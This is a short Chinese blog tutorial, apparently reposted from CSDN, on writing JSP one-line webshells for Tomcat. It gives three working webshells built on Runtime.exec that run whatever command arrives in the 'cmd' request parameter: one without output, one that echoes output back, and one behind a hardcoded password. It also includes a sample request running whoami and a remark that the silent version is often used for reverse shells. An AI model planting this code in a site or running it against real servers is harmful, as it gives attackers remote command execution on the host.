java安全——jsp一句话木马
短信预约 -IT技能 免费直播动态提醒
jsp回显一句话木马
文章目录
提示:以下是本篇文章正文内容,下面案例可供参考
一、搭建web服务
1、创建空白maven项目,搭建本地tomcat
2、引入servlet的pom依赖
二、无回显一句话
<% Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));%>
http://localhost:8003/index.jsp?cmd=whoami
不会回显执行的结果只能在后台打印一个地址,常用来反弹shell
三、带回显一句话
代码如下(示例):
<% Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));// System.out.println(process); InputStream inputStream = process.getInputStream(); BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = bufferedReader.readLine()) != null){ response.getWriter().println(line); } %>
三、有密码带回显一句话
<% if ("password".equals(request.getParameter("pass"))){ Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));// System.out.println(process); InputStream inputStream = process.getInputStream(); BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = bufferedReader.readLine()) != null){ response.getWriter().println(line); } } %>
来源地址:https://blog.csdn.net/m0_46317063/article/details/128816033
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341